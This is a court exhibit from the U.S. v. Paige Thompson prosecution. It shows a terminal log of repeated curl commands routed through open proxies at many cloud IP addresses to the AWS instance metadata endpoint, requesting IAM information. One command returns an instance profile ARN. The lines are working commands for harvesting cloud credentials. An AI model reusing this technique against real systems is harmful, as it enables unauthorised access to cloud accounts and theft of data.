45  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.230.94.207:80 http://169.254.169.254/latest/meta-data/iam/info
46  {
47      "Code" : "Success",
48      "LastUpdated" : "2019-03-14T10:34:21Z",
49      "InstanceProfileArn" : "arn:aws:iam::          0976:instance-profile/
50      "InstanceProfileId" :                     OHEK"
51  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.56.74.202:3128 http://169.254.169.254/latest/meta-data/iam/info
52  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.174.204.120:80 http://169.254.169.254/latest/meta-data/iam/info
53  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.175.199.206:8888 http://169.254.169.254/latest/meta-data/iam/info
54  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.9.19.220:3128 http://169.254.169.254/latest/meta-data/iam/info
55  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.251.144.8:8888 http://169.254.169.254/latest/meta-data/iam/info
56  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.114.159.59:80 http://169.254.169.254/latest/meta-data/iam/info
57  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.94.113.114:3128 http://169.254.169.254/latest/meta-data/iam/info
58  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.233.234.169:80 http://169.254.169.254/latest/meta-data/iam/info
59  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.58.159.44:80 http://169.254.169.254/latest/meta-data/iam/info
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 647
Admitted_____